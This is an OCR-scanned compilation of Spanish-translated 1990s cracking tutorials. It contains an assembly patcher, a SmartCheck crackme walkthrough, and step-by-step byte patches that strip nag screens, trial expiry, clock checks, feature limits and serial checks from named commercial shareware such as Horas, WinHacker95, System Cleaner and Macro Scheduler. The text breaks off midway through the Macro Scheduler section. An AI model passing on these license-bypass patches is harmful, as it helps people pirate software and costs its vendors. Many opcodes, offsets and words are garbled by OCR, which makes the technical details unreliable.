near 
ah, 3Eh ; Cerrar la función de archivo 3Eh 
bx,filehandle 
21h 


near 
bx,ax 
ax, 4202h 
CX,CX ; Comprobar filelength longitud del archivo) 
dx, dx 
21h 
error 
ax, lowsize ; (Lowbyte) 
size _mismatch 
dx, highsize ; (Highbyte) 


size _mismatch 


near 
ah,3fh 
bx,filehandle ; Leer la funcción de archivo 3Fh 
cx,1 
dx,offset readbyte 
21h 
ah, readbyte 
[di],ah ; Comparar los bytes parcheados 
already patched 


LOT. 


near 
ah, 40h 
bx,filehandle 
cX;y:L ; Escribir la función de archivo 40h 
dx,di 
dx 
21h 


error 


near 
ah, 42h 
al,0 
bx,filehandle ; Mover el archivo al puntero de la funcíon 42h 
dx, [si] 
cx, [si+2] 
21h 


here 


Jjmp error 


retn 


seek file endp 


filenaam db '"JSSCRAM.EXE', O 
filehandle dw 0 
lowsize dw 62976 
highsize dw 3 
readbyte db 0 
logo db '[PATCH FOR [FILEIN] GENERATED BY THE SANDMAN', 0ODh, 0Ah 
db "b OPENING FiLE : ','S' 
fsize db "OK! ',0Dh,0Ah, 'p CHECKiNG FiLESiZE : $' 
crackfile db "OK! ',ODh,0Ah, 'p CRACKiNG FiLE : $' 
cracksucc db "OK!",ODh,0Ah, 'p PATCH SUCCESSFULL!"',ODh,0Ah, '$" 
alreadycrk db 'SJiT!',ODh,0Ah, 'b FiLE ALREADY PATCHED OR' 
db ' DiFFERENT!',0Dh,0Ah, 'S' 
sizemismtch db 'SJiT!',ODh,0Ah, 'b FiLE iS PACKED OR WRONG" 
db ' VERSiON!'",0Dh, 0Ah, '$' 
erroropen db 'SJiT!',ODh,0Ah, 'pb CAN', 027h,'T OPEN FiLE" 
db '11*,ODh,0Ah, '$S' 
ofs dw 13421 ,3 , 13422 ,3, 13423,3, 13424, 3 


data db 184, 139 , 160, 69 , 65, 244 , 67, 144 
do 0, 144 


code ends 


end start 


Notas Finales 


Puede que este programa esté entre los básicos, pero yo aprendí una barbaridad sobre crackear programas que se registran con una clave 
y, lo que es más importante, sobre el eco en la memoria de las passwords/números de serie, del que podemos obtener muchas ventajas. 


Una vez hube localizado la dirección de memoria donde el programa genera el número correcto, lo comprobé poniendo un punto de 
interrupción con Softice: bpm (break point on memory access RW) en este área para confirmar que esta era el área que el programa usa y 
no una que pudiera ser usada para confundirnos. Rápidamente me di cuenta de que era después del mensaje 'Beggar off cracker' cuando 
el programa borra la password de la memoria. Luego, todo lo que tenía hacer era verificar que el programa no alteraba la dirección base del 
registro ebp antes de tener la oportunidad de usar la instrucción mov eax, dword ptr [ebp-0C]. No lo hizo, por lo que era seguro continuar 
y Usar esa nueva instrucción. 


No es necesario tener ningún conocimiento de “Direccionamientos de memoria directos o indirectos? para descubrir por qué una instrucción se diferencia 
de otra, o que el registro ebp es usado por el programa como una regleta deslizante, donde simplemente determinando un desplazamiento desde la 
dirección base del registro ebp podemos especificar direcciones de memoria por encima y por debajo del mismo. El parcheado que hicimos, sustituyendo 
una instrucción de direccionamiento directo de memoria por una de direccionamiento indirecto, puede ciertamente marcar la diferencia en un crack. 


Mis agradecimientos van para: 


Fravia+ por proporcionar posiblemente los mayores recursos de conocimientos de Ingeniería Inversa en la Red. 


+ORC por mostrame la luz al final del túnel. 


Ob Duh 


Debo recordaros a todos/as que comprando y NO robando el software que usáis, conseguiréis que las compañías de 
software sigan produciendo un "mejor" software para el uso de todos/as y, lo que es más importante, sigan proporcionando 
mejores desafíos para quebrar sus a menudo débiles sistemas de protección. 

Si estáis buscando cracks o números de serie en estas páginas, estáis perdiendo el tiempo; intentad buscarlas en otros 


puntos de la Red, en Warez, Cracks, etc. 


Siguiente [Volver al Indice de Ensayos | Anterior 


Ensayo por: The Sandman 
Página Creada el 27 de mayo de 1998 
Traducido por: — frantic en junio de 2000 


Numega Smartcheck 5.0 
Guia para principiantes: 


Objetivo: 
Braga.exe - Braga's Little Crackme 1 in Visual Basic 5 


Herramientas: 
Smartcheck 5. en ftp busca smchk50.exe 


A pesar de que hay varios tutoriales de Smartcheck en fravia.org, verdaderamente 
no ayudan a comenzar con SC, espero que este tutorial te ayude a aprender a usar 
esta fantastica herramienta. Este tutorial ta ayudara a figurarte lo basico, para acabar 
diciendo como crackear completamente braga 


Para aquellos que no estan familiarizados con SC y lo que es aqui va una descripcion 
del archivo de aryuda principal: 


Smart check es una herramienta para debuggear direcciones en tiempo de ejecucion las mas problematicas 
encontradas por los desarrolladores de Visual Basic: 


Errores fatales en tiempo de ejecucion que son cripticos y dicificiles de resolver 
Problemas como resultado de una secuencia de eventos 

Uso incorrecto de la API de Windows desde Visual Basic 

Valores incorrectos pasados en la construccion de funciones 

Valores problematicos 

Errores en componentes, tales como controles ActiveX, usados por nuestro programa 


heh heh, bien, no solo se usa SC para encontrar errores en programas de VB 
puedes usarlo para hacerlo con otros, tanto si estan en VB como si no. De hecho 
una noticia para todos los crackers que odian las aplicaciones en VBS5: 

SC lo hace DIVERTIDO!! 


Ok, suficiente introduccion. Despues de que corras el setup (y hayas encontrado el 
password requerido usando sice) inicia SC. En el archivo menu, selecciona open y abre 
braga.exe. Luego en el menu Program, selecciona settings. 

Cambia lo que tengas por esto: 


Todas las cajas en Error Detection deberian ser verificadas. 


En Advanced, en Error Detection, las cuatro primeras checkboxes deberian 
ser elegidas, el resto no deberia ser chequeado. Asegurate de que 'Suppres API calss' NO. 


En Reporting, todo excepto 'Report mousemove events from 
OCxX”. 


Phew! Ok, ahora, pulsa el boton verde 'play' y permite el inicio. Espera a que 

una nueva ventana sea abierta en SC, dividida en tres secciones. 

a new window will be opened in SC, split into three sections.Sobre la seccion final 

no debes preocuparte, porque normalmente no tiene el codigo fuente del objeto. En este 
deberias leer "No source file". 


En la seccion de arriba a mano izquierda, deberias ver muchas lineas de llamadas 
a fucniones, pulsando en una revelaras mas detalles en la seccion de la derecha 
Una de las funciones que deberias ver, la primera de la lista, es 
InitializeCriticalSection(PTR: xxxXXXXxX) 


Si miras abajo en la esquina derecha de la ventana principal, deberias ver 

los eventos del programa que han ocurrido. yo tengo 1360 desde que he cargado braga.exe 

En el menu View selecciona Show all events. Cuando sepas mas sobre SC, puedes experimentar 
con Specific Events (Los Object Events son normalmente buenos para nuestras necesidades) 


OK, Braga deberia estar cargado, asi que entra un nombre y un serial cualquiera, 
y pulsa en Register. Probablemente obtendras una Dlg box diciendo "Keep Trying :)))" 


Bien, permiteme ver lo que me ha dado SC, Busca las 4 primeros carcteres del nombre que 
hayas entrado (para mi, entre night_mastah[mgm], por lo tanto busque nigh) 


Como resultado de esto deberias estar en 
_ vbaVarMove(VARIANT:String:"night_m",VARIANT:Empty) returns DWORD:63F35C 


Bien, no hay que ser un genio para figurarse lo que pasa aqui. Puedes ver, tu nombre 
ha sido cogido y llevado a la localizacion de memoria 63F35C o cualquier otra 
Sigue los Program Results hacia abajo y deberian hablar por si mismo 


Obtendras tu serial, y guardalo para despues. Encontraras la longitud, LENgth, de tu nombre 

, y el caracter de mas a la izquierda LEFTmost character, para mi la n 

your name, then finds the LEFTmost character, for me it was 'n'. y luego el 

valor Ascii para esa letra, luego cambia esto a HEX,y despues encuentra las cuatro primers letras 
de tu nombre, a pesar de que pienso que no ocurre lo siguiente, es lo que Braga pretende. 

Pienso qu para salir de SC intento encontrar los valores ascii de las 4 primeras letras 

pero todo los programas encuentra el valor Ascii para la primera y luego cambian a HEX 


Desplazandote hacia abajo, deberias llegar a la seccion __vbaVarCat, donde 
comienza el trabajo. De nuevo, es medianamente facil de ver lo que esta ocurriendo, pero si no, te lo explicare 


1) Coge el valor hex de la primera letra de tu nombre, luego suma un '- 

2)Al final de eso, suma la cadena 'Pt-Cracker', y otro '-' (la cadena es ajora 'xx-Pt-Cracker-" donde xx es el val hex... 

3) Luego suma otra vez el valor HEX de la primera letra de tu nombre (aunque no creo que quiera decir esto, quizas..) 'xx-Pt-Cracker-xx 
4)Then, another '-' is added to the string. 'xx-Pt-Cracker-xx-' 

5)Finalmente, suma a la cadena 12345. El rdo es 'xx-Pt-Cracker-xx-12345' 


Desplazate hacia abajo y encontraras __vbaVarTstEq(VARIANT:String:"111222333444555", VARIANT:String:"6E-Pt-Cracker-6E-12345") 
AMAAAAAMAMAAA y lo que tu hayas entrado como serial 


Asi que si quieres parchearlo, en Wdasm, deberias comenzar a buscar en 
10040239E (__vbaVarTstEgO) location) 
Para convertir direcciones desde SC a Wdasm, Si tiene 000, cambialos por 004. 


Espero que este pequeno tutorial te haya ayudado a comprender un poco sobre SC 


Si te ha ayudado, por favor compensalo diciendome un "Hi" a mi (night_mas) 
en H+Cracking4newbies o +Magnum on Effnet. 


Hasta la vista 
night mastah 
magnum 98 Traducido por Munoz 


Hi dudes! 

Hola! 

Esta vez me gustaria enseñarte como crackear limitacion por tiempo 

o por fecha de expiracion y como remover algunos nags. 

Se que he prometido escribir un tutorial acerca de soft ice 

Pero no tengo suficiente memoria para correr softice, solo tengo 8 megas de RAM 


Lo siento por los errores, espero que me entiendas 


Herramientas: 


W32Dasm 8.9 o superior (usa la busqueda en FTP de: W32DSM89.ZIP) 
Hacker's View 5.65 (E-mail: sen Osuslikov.kemerovo.su) 
FAR 1.40b (ftp://ftp.elf.stuba.sk/pub/pc/utilfile/far140b.exe) 


CONTENIDOS: 


1) a. Como remover NAGs in Horas 2.1a (sin W32Dasm) 
URL: http://www.basta.com 


b. Como crackear la expiracion por fecha en Horas 2.1a (con W32Dasm) 
URL: http://www .basta.com 


2) a. Como crackear la expiración por fecha en WinHacker95 2.0b3 (con W32Dasm) 
URL: http://www.wedgesoftware.com 


b. Como crakear WinHacker95 2.0b3 (entrando cualquier numero de serie) 
URL: http://www.wedgesoftware.com 

PARTE la: Remover NAGs en Horas 2.1a (sin W32Dasm) 
(Uso este metodo normalmente porque es mas rapido y facil) 
Step 1. Corre HORAS.EXE 
Step 2. Ves esas asquerosas Nags que te gustaria remover. ¿Verdad? 
Step 3. Ok, sal del programa. 
Step 4. Corre FAR, ve a Horas directamente. 
Step 5. Copia HORAS.EXE como HORAS.EXX (backup) y corre HIEW HORAS.EXE. 
Step 6. Pulsa F4 para seleccionar modo HEX, veras el codigo HEX de HORAS.EXE. 
Step 7. Recuerdas que dicen las NAGs screen? Ah, deberias escribir abajo esas 


palabras cuando corras PEXE32.EXE. Dicen "Welcome to Horas" o 
"Horas is a shareware application. You are invited to.." etc etc. 


Step 8. Pulsa F7 para buscar, entra "welcome" (en caracteres ASCII). Has encontrado 
la cadena?. Ok, recuerda HORAS.EXE es una aplicacion de 32 bits,por 
lo tanto usara la cadena "00" entre cada letra "welcome" (no el 


caracter espacio) 


Step 9. Pulsa F7 de nuevo, entra "w" (en ASCID), pulsa la fecla abajo, entra 
"00" (en HEX), Arriba, "e", Abajo, "00",arriba,"1",abajo, "00",arriba 
"c" abajo, "00" arriba, "o",abajo, "00", arriba, "m",abajo,"00",arriba 
"e", Deberias ver lo siguiente 


AREA RARARRRAR RARA RARARRRRARRRRRA 


ÉÍ[F2: Forward /F4:FuM JOA aTao... 
*ASCll:w e l c o m  essecccs_ 


o 


* Hex: 77 00 65 00 6C 00 63 00 6F 00 6D 00 65 922002... 


ILLA RRARRA RARA RRAR RAR RAR RRRRARARRARRARARARARRARARARRRRA 


EXA... 
Step 10. Ok, Pulsa ENTER para encontrar la cadena. Veras algo como esto: 


.000478C0: 06 00 00 00-00 00 DE 00-64 0000 00-00005700 Pd W 
.000478D0: 65 00 6C 00-63 00 6F 00-6D 00 65 00-20007400 elcome t 
.000478E0: 6F 00 20 00-25 00 73 00-00 00 08 00-4D 005300 o %s MS 
.000478F0: 20 00 53 00-61 00 6E 00-73 00 2000-53006500 Sans Se 


.00047900: 72 00 69 00-66 00 00 00-00 00 02 50-00 000000 rif P 
.00047910: 07 00 07 00-DO 00 30 00-84 69 FF FF-82 002500 DO0,.1yy, % 
.00047920: 73 00 20 00-69 00 73 00-20 00 61 00-20007300 s is a s 
.00047930: 68 00 61 00-72 00 65 00-77 00 61 00-720065 00 hareware 
.00047940: 20 00 61 00-70 00 70 00-6C 00 69 00-63 006100 applica 
00047950: 74 00 69 00-6F 00 6E 00-2E 00 20 00-20 005900 tion. Y 
.00047960: 6F 00 75 00-20 00 61 00-72 00 65 00-20006900 ou are 1 


Step 11. Busca en FF FF 82 Antes de la cadena "%s is a shareware.." Es 
donde se generaran los dialogos, recuerda solo 2 o 4 FF's y 82. 
Ahora usa las flechas para traer el cursor a "82" 
Veras "4791C" en la pantalla, pulsa F3 y cambia "82" a 
"7E", Estas en la direccion offset 4191C. Es donde puedes parchearlo 
Pulsa F9 para actualizar HORAS.EXE. 
Alguien me ha dicho que puedes cambiar "82" a "90" en vez de hacerlo por "7E" 
Haras la misma "trampa" 


Step 12. Recuerda, solo los bytes 4 FF's y 82. Haciendolo de otro modo 
puedes joderla. A veces son 2 FF's and 82 los bytes que deberias 
cambiar, Una vez has cambiado "7E" por "82", no generara los dialogos. 
Sal de HIEW y corre HORAS.EXE. 


Step 13. Ves esas horribles NAGs? Bien! Has crackeado Horas 2.1a!! 


PART 1b: Crackear la fecha de expiracion en Horas 2.1a (con W32Dasm) 
Step 1. Corre HORAS.EXE 


Step 2. Veras esos mensajes de error que dicen que el programa ha expirado 
Deberias escribir estos mensajes y salir del programa. 


Step 3. Corre FAR, ve al directorio Horas. 


Step 4. Copia HORAS.EXE como HORAS.EXX (backup) y corre HIEW HORAS.EXE. copia el 
ejecutable y renombralo como HORAS.W32 


Step 5. Corre W32Dasm y desensambla HORAS.W32. 


Step 6. Una vez desensamblado, pulsa en STRING DATA REFERENCE, busca la cadena 
"The evaluation period for this product has expired. Please..”. y haz doble 
click sobre el 


Step 7. Cierra la ventana SDR, deberias ver: 
* Possible Reference to String Resource ID=25016: "The evaluation per.. 


:0040C975 68B8610000 push 000061B8 


Step 8. Ok, pulsa la flecha de arriba hasta que veas: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
1:0040C904 (C), :0040C918 (C), :0040C92D (C) 


Step 9. Pulsa ahora la tecla PgUp 2 o 3 veces hasta ver esto: 


:0040C8F7 85C0 test eax, eax 

:0040C8F9 0F85BD000000 jne 0040C9BC 
:0040C8FF 8B4628 mov eax, dword ptr [esi+28] 
:0040C902 85C0 test eax, eax 

:0040C904 756B jne 0040C971 

:0040C906 8B 17 mov edx, dword ptr [edi] 
:0040C908 51 push ecx 

:0040C909 8BC4 mov eax, esp 


Step 10. Mira en 0040C904, ¿recuerdas esa direccion referenciada? Ahora 
busca hasta que encuentres la ultima comparacion como "test" o 
"ne" etc. Mira en 0040C8F7, que es donde se saltara cuando haya 
expirado. vamos a intentarlo. 
Asegurate que la barra de color verde esta en 
:0040C8F9 0F85BD000000 jne 0040C9BC 
deberias ver la direccion Offset siguiente Offset VOOOBCF9h. 
Aqui es donde puedes parchear HORAS.EXE. 


Step 11. Regresa a FAR, corre HIEW HORAS.EXE, pulsa F4 para seleccionar 
Decode mode (ASM), pulsa FS y entra BCF9. Deberias ver: 


.0000C8F9: 0F84BD000000 je  .00000C9BC ===------- (1) 
.0000C8FF: 8B4628 mov  eax,[esi][00028] 
.0000C902: 85C0 test eax,eax 


Step 12. Ahi es donde puedes cambiar los bytes, pulsa F3, entra 0F85, pulsa 
F9 para actualizar HORAS.EXE. Sal de HIEW. 


Step 13. Corre HORAS.EXE, ¿Ha expirado? Voila! Has crackeado Horas 2.1a!! 


PART 2a: Crackear expiracion por fecha en WinHacker95 2.0b3 (con W32Dasm) 
Step 1. Corre WH95.EXE 


Step 2. Veras el mensaje de error que dice que ha expirado, y que tienes que 
registrarte y sal del programa. (¿has apuntado el mensaje de error?) 


Step 3. Corre FAR, y ve al directorio WH9S. 
Step 4. Haz como en el paso 4 del caso anterior pero con WH95 
Step 5. Corre w32dasm y desensambla WH95.W32. 


Step 6. Una vez desensamblado, pulsa en STRING DATA REFERENCE, busca la 
cadena "Your trial period is over!". Y haz doble click sobre el. 


Step 7. Cierra la ventana de SDR window, deberias ver: 


* Possible StringData Ref from Data Obj ->"Y our trial peroid is over!" 


:00429977 6844D34400 push 0044D344 
:0042997C 8D8208020000 lea eax, dword ptr [edx+00000208] 
:00429982 50 push eax 


Step 8. Ok, pulsa arriba hasta que veas: 


* Referenced by a (U)nconditional or (C)onditional Jump at Addresses: 
[:004298AE (C) 


Step 9. Rresiona PgUp 40 5 veces hasta que veas esto: 


:004298AE 0F382A 1000000 jb 00429955 

:004298B4 7517 jne 004298CD 

:004298B6 51 push ecx 

:004298B7 8D8208020000 lea eax, dword ptr [edx+00000208] 


Step 10. Mira en 004298AE, recuerdas esa direccion referenciada? 
Es donde saltaras cuando expire. 
Asegurate que la barra verde este en 
:004298AE 0F82A 1000000 jb 00429955 
Veras abajo de la pantalla esto Offset 0O028CAEh. Que es 
donde puedes parchear WH95.EXE. 


Step 11. Regresa a FAR, corre HIEW WH95.EXE, pulsa F4 para seleccionar decode 
mode (ASM), pulsa FS y teclea 28CAE, Deberias ver: 


.000298AE: 0F382A 1000000 jJb  .000029935 oa=----- (1) 
.000298B4: 7517 jne .0000298CD ---------- (2) 


.000298B6: 51 push ecx 


Step 12. Esos son los bytes que puedes cambiar, pulsa F3, entra EB0090909090, 
y F9 para actualizar. Esos EB0O0 dicen que no salte pero continue en 
la siguiente linea, y los 90909090 Haran Nop, es decir, no haran. 
Sal de HIEW. 


Step 13. Corre WH95.EXE, ¿Ha expirado? Voila! Has crackeado WH95 2.0b3!! 
PART 2b: Como crackear WH9S5 2.0b3 (entrando cualquier numero) 
Step 1. Corre WH9S5.EXE 


Step 2. Entra "TKC/PC '97" como nombre, y Company: "PC '97", Serial: "12345" 
y pulsa en registrar 


Step 3. Veras el mensaje de error. ¿Que hay que hacer? y sal del programa 
Step 4. Corre FAR, ve al directorio WH95 


Step 5. Copia WH95.EXE a WH9S.EXX (backup) y luego WH9S5.EXE como 
WH95.W32 (para el W32Dasm) 


Step 6. Desensambla WH95.W32. 


Step 7. Cuando haya acabado el W32Dasm, pulsa en STRING DATA REFERENCE, 
Busca la cadena "Invalid Serial Number!".y haz doble click sobre ella 


Step 8. Cierra la ventana de SDR, Veras: 
* Possible StringData Ref from Data Obj ->"Invalid Serial Number!" 


:00429719 68E0D24400 push 0044D2E0 
:0042971E 8D4DF0 lea ecx, dword ptr [ebp-10] 


Step 9. Ok,Busca la ultima comparacion CMP, JNE, JE, TEST, 
anterior al error. Pulsa arriba hasta que encuentres: 


:004296FB 7474 je 00429771 
:004296FD 8B4DF0 mov ecx, dword ptr [ebp-10] 
:00429700 C7416C00000000 mov [ecx+6C], 00000000 


Step 10. Ya sabes cuando salta al meter un codigo erroneo. 
Veamos si funciona cambiando "je" por "jne" o por "eb". 
La barra de color verde debe estar en 
:004296FB 7474 je 00429771, 
y deberias ver el offset (POffset 0OO28AFBh. Que es donde puedes parchear 


WHDOS5.EXE. 


Step 11. Regresa a FAR, corre HIEW WH95.EXE, pulsa F4 para el modo Decode 
(ASM), ES y entra 28AFB. deberias ver: 


.000296EB: 7474 je .000029771 =---=------ (1) 
.000296FD: 8B4DF0 mov  ecx,[ebp][-0010] 
.00029700: C7416C00000000 mov  d,[ecx][0006C],000000000 


Step 12. Aqui es donde puedes cambiar los bytes, pulsa F3, entra EB, pulsa F9 
para actualizar WHO9S y sal de HIEW. 
Step 13. Corre WH95.EXE, entra cualquier codigo. ¿Funciona? no te preocupes. seguimos 
Step 14. Corre WH95.EXE de nuevo. 
Step 15. Entra otra vez el nombre y ... y pulsa en Register. 
Step 16. Veras el mensaje de error, sal del programa 


Step 17. Regresa a W32Dasm, pulsa en STRING DATA REFERENCE, busca la cadena 
"Error 1000: Invalid Serial Number!".Haz doble click sobre el. 


Step 18. Cierra la ventana SDR, Deberias ver: 
* Possible StringData Ref from Data Obj ->"Error 1000: Invalid Serial.." 


:004229C3 686CCE4400 push 0044CE6C 
:004229C8 E8C3030000 call 00422D90 


Step 19. Ok, Busca la ultima comparacion CMP, JNE, JE, TEST, 
anterior a la cadena de error. Pulsa arriba hasta que encuentres: 


:004229BC 7424 je 004229E2 
:004229BE 6A3B push 0000003B 
:004229C0 8B4DEC mov ecx, dword ptr [ebp-14] 


Step 20. Ya sabes donde salta cuando entras un codigo erroneo. 
Vamos a ver si trabaja reemplazando "je" con "jne" o con 
"eb". La barra verde debe estar en 
:004229BC 7424 je 004229E2. 


Deberias ver el offset Offset 00021DBCh. que es donde puedes parchear 


Step 21. Regresa a FAR, corre HIEW WH95.EXE, pulsa F4 para seleccionar Decode mode 
(ASM), pulsa FS y entra 21DBC. Deberias ver: 


.000229BC: 7424 je  .0000229E2 ==-=--=--- (1) 
.000229BE: 6A3B push 03B 
.000229C0: 8B4DEC mov  ecx,[ebp][-0014] 


Step 22. Hay es donde puedes cambiar los bytes, pulsa F3, entra EB, pulsa F9 
para actualizar y sal del HIEW 


Step 23. Corre WH95.EXE, y entra cualquier numero. Voila! Has crackeado WH9S5 2.0b3!! 


Ok, suficiente por ahora. Espero que hayas disfrutado tanto como lo he hecho 


yo. Te veo en el proximo Tutorial 


Have fun, 

The Keyboard Caper, 

The Founder of PhRoZeN CReW '94 - '97 
27-8-1997 


Traducido por Muñoz! el 6-02-00 


hola! 


4 meses sin tutoriales! Phew, pero como puedes ver he vuelto a la escena del 
cracking, he regresado a PC,no estas feliz? Ok, Hoy te enseñare como resolver 
limites por timeout y como activar algunas funciones deshabilitadas en algunos 
programas (y como registrarte:-)) 


Todavia no empiezo con el Soft ice pero en el 45 hablare de como funciona el IDA 
(Interactive Disassembler) 


Ok, Vamos alla! 
HERRAMIENTAS: 
Necesitas las siguientes herramientas (que son las que yo uso) 


W32Dasm 8.9 o superior version (busca en algun FTP: W32DSM89.ZIP) 
Hacker's View 5.66 (E-mail: sen Osuslikov.kemerovo.su) 

FAR 1.50b (ftp://ftp.elf.stuba.sk/pub/pc/utilfile/far140b.exe) 

o el Windows Commander 3.50 en vez del FAR (http://www.ghisler.com) 


CONTENIDOS: 


1) a. Como crackear Expiracion por fecha en System Cleaner 1.21 (con W32Dasm) 
URL: http://infortech.reedes.com 
b. How to evitar la NAGS sobre fecha invalida in System Cleaner 1.21 (w/W32Dasm) 
URL: http://infortech.reedes.com 
2) Como activar funciones en Macro Schedular 4.3.11 (con W32Dasm) 
URL: http://www.mjtnet.com 


3) Como crackear TrayCal 1.0 (metiendo cualquier codigo) 
URL: http://www.spaeder.com 


4) Porque copio los archivos *.EXE a *.W32 

5) Codigo fuente en ASM de un parche por Nop/PC '97 

PARTE la: Crackear la expiracion por fecha en System Cleaner 1.21 (con W32Dasm) 
P1. Corre SystemCleaner.EXE 

P2. Veras el mensaje de error que dice que ha expirado. 

P3. Ok, sal del programa. 

P4. Corre WC, ve al directorio system Cleaner. 


PS. Copia SystemCleaner.EXE a SystemCleaner.EXX (backup) y copia 
SystemCleaner.EXE a SystemCleaner.W32 (para usar con W32Dasm) 


P6. corre W32Dasm y desensambla SystemCleaner.W32 


P7. Una vez desesamblado, pulsa en STRING DATA REFERENCE, busca la cadena 
"The trial period has ended. Please..". 


PS. Cierra la ventana SDR window, you should see the line: 


:00464BB6 668B0DE44B4600 mov cx, word ptr [00464BK4] 
:00464BBD B202 mov dl, 02 


* Possible StringData Ref from Code Obj ->"The trial period has ended. Please " 
->"register this software!" 


P9. Ok, pulsa arriba hasta que veas: 


:00464BAS8 53 push ebx 

:00464BA9 8BD8 mov ebx, eax 

:00464BAB 80BBOC01000000 cmp byte ptr [ebx+0000010C], 00 
:00464BB2 741C je 00464BDO 

:00464BB4 6A00 push 00000000 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
1:00464B4F(C) 


P10. Mira en donde se referencia a la funcion en 00464B4FK(C), pulsas PgUp 
203 veces hasta que veas: 


:00464B4F 7065 jo 00464BB6 
Y busca hasta que veas: 
:00464B54 64 BYTE 064h 


Si ves la cadena "BYTE xxxh", ignorala!! No es un salto real, 
es solo una cadena, Ok regresa a la direccion 00464BAS. 
Encontraras una comparacion, mira en 464BB2, es donde saltaras cuando 
haya expirado. Vamos a verlo. 
Asegurate de que la barra verde este en 
:00464BB2 741C je 00464BDO 
veras Offset 00063FB2h, donde parchear el ejecutable. 


P11. Regresa a WC, corre HIEW SYSTEM-1.EXE, pulsa F4 para Decode mode 
(ASM), luego FS y entra 63FB2. veras: 


.00064BB2: 741C je .000064BDO ---------- (1) 
.00064BB4: 6A00 push 000 
.00064BB6: 668B0DE44B4600 mov  cx,[000464BF4] 


P12. Es donde puedes cambiar los bytes, pulsa F3, entra EB, pulsa F9 
para actualizar SYSTEM-1.EXE. Sal HIEW. 


P13. Corre SystemCleaner.EXE, ¿Ha expirado? Voila! Lo has hecho!! 


PART 1b: Evitar la NAG sobre la fecha invalida en System Cleaner 1.21 (con W32Dasm) 


(Esto se usa solo si cambias la fecha a 12/25/98 por ejemplo y regresas 

a 12/25/97, Veras una NAG que dice "The system clock has been 

moved back. Please reset system clock to correct blah blah" ("El reloj del 
systema ha sido cambiado. por favor resetealo....) 


P1. Corre SystemCleaner.EXE 


P2. Veras el mensaje de error que dice que la jodida fecha ha sido cambiada 
Recuerda lo que dice. 


P3. Ok, sal del programa 
P4. Corre WC, ve al directorio System Cleaner 


PS. Copia SystemCleaner.EXE a SystemCleaner.EXX (backup) y copia 
SystemCleaner.EXE a SystemCleaner.W32 (para el W32Dasm) 


P6. Corre W32Dasm y desensambla SystemCleaner.W32 


P7. Una vez desensamblado, pulsa en STRING DATA REFERENCE, y busca 
la cadena "The system clock has been moved back". haz click sobre ella 


P8. Cierra la ventana SDR, deberias ver: 
:00464E56 668B0D884E4600 mov cx, word ptr [00464E88] 
:00464E5D B201 mov dl, 01 


* Possible StringData Ref from Code Obj ->"The system clock has been moved " 
->"back. Please reset system clock " 
->"to correct time before re-rumning " 


P9. Ok, pulsa arriba hasta que veas: 


:00464E48 53 push ebx 

:00464E49 8BD8 mov ebx, eax 

:00464E4B 80BB0C01000000 cmp byte ptr [ebx+0000010C], 00 
:00464E52 7421 je 00464E75 

:00464E54 6A00 push 00000000 


:00464E56 668B0D884E4600 mov cx, word ptr [00464E88] 


P10. mira en 00464E52, es donde saltaras cuando la fecha este jodida. Vamos aver 
La barra verde estara en :00464E52 7421 je 00464E75 
y veras el siguiente offset Offset 00064252h, donde puedes parchear SystemCleaner.EXE. 


P11. Regresa al WC, corre HIEW SYSTEM-1.EXE, pulsa F4 para seleccionar el Decode mode 
(ASM), pulsa FS y entra 64252. deberias ver: 


.00064E32: 7421 jmps .000064E75  ---------- (1) 
.00064E534: 6A00 push 000 
.00064E36: 668B0D884E4600 mov  cx,[000464E388] 


P12. Es donde puedes cambiar los bytes, pulsa F3, luego entra EB, y F9 
para actualizar SYSTEM-1.EXE. Sal de HIEW. 


P13. Corre SystemCleaner.EXE, ¿Que tal? Voila! Lo has hecho!! 


PARTE 2: Activar funciones deshabilitadas en Macro Schedular 4.3.11 con el W32Dasm 
P1. Core MSCHED.EXE 


P2. Intenta aderir mas macros y te dira que el numero maximo esta limitado a 2 macros. 
Escribe este mensaje abajo y sal del programa. 


P3. Corre WC, ve al directorio MSCHED 


P4. Copia MSCHED.EXE a MSCHED.EXX (como cpia de seguridad) y copia MSCHED.EXE 
como MSCHED.W32 para el desensamblado 


PS. corre W32Dasm y desensambla MSCHED.W32. 


P6. Una vez hecho esto, pulsa en STRING DATA REFERENCE, busca "Unregistered 
copies of MS are limited to..”. y haz click sobre el 


P7. Cierra la ventana SDR, deberias ver: 


* Possible StringData Ref from Code Obj ->"Unregistered copies of Macro.." 
->"have a limit of 20 lines per.." 


:00448AED B860954400 mov eax, 00449560 


PS. Ok, pulsa arriba hasta que eas: 


:00448ACA 7530 jne 00448 AFC 

:00448 ACC 8B8370020000 mov eax, dword ptr [ebx+00000270] 
:00448AD2 8B80FC000000 mov eax, dword ptr [eax+000000éFC] 
:00448AD8 8B10 mov edx, dword ptr [eax] 

:00448 ADA FF5210 call [edx+10] 

:00448ADD 83F813 cmp eax, 00000013 

:00448AE0 7E1A jle 00448 AFC 

:00448AE2 6A00 push 00000000 


P9. Busca en las direcciones 00448ACA y 00448AE0 
Es donde saltara.Pon la barra verde sobre 
:00448ACA 7530 jne 00448 AFC 
Y el offset sera Offset 00O047ECAh. donde parchear el MSCHED.EXE. 


P10. Regresa a WC, corre HIEW MSCHED.EXE, pulsa F4 para elejir Decode mode 
(ASM), ahora F5 y entra 47ECA. Deberias ver: 


.00048ACA: 7530 jne .000048AFC —---------- (0) 
.00048ACC: 8B 8370020000 mov  eax,[ebx][000000270] 
.00048AD2: 8B80FC000000 mov  eax,[eax][0000000éFC] 
.00048AD8: 8B10 mov  edx,[eax] 

.00048ADA: FF5210 call d,[edx][00010] 
.00048ADD: 83F313 cmp  eax,013 

.00048AEO: 7ElA jle .000048AFC  =--=-=----- (2) 


P11. Ahi es donde puedes cambiar los bytes, pulsa F3, y entra EB 


y ve hasta 7E1A (offset 47EE0), entra EB y F9 para actualizar 
MSCHED.EXE. Sal de HIEW. 


P12. No esta hecho todavia! Abre la ventana SDR y haz doble click en 
"Unregistered copies..” de nuevo. 


P13. Cierra la ventana SDR, Deberias ver estas lineas: 


* Possible StringData Ref from Code Obj ->"Unregistered copies of Macro.." 
->"have a limit of 20 lines per.." 


:0044DB9E B86CDC4400 mov eax, 0044DC6C 


P14. Ok,pulsa arriba hasta que veas: 


:0044DB7D 752C jne 0044DBAB 

:0044DB7F 8B83D4090000 mov eax, dword ptr [ebx+000009D4] 
:0044DB85 8B 80FC000000 mov eax, dword ptr [eax+000000éFC] 
:0044DB8B 8B10 mov edx, dword ptr [eax] 

:0044DB8D FF5210 call [edx+10] 

:0044DB90 48 dec eax 

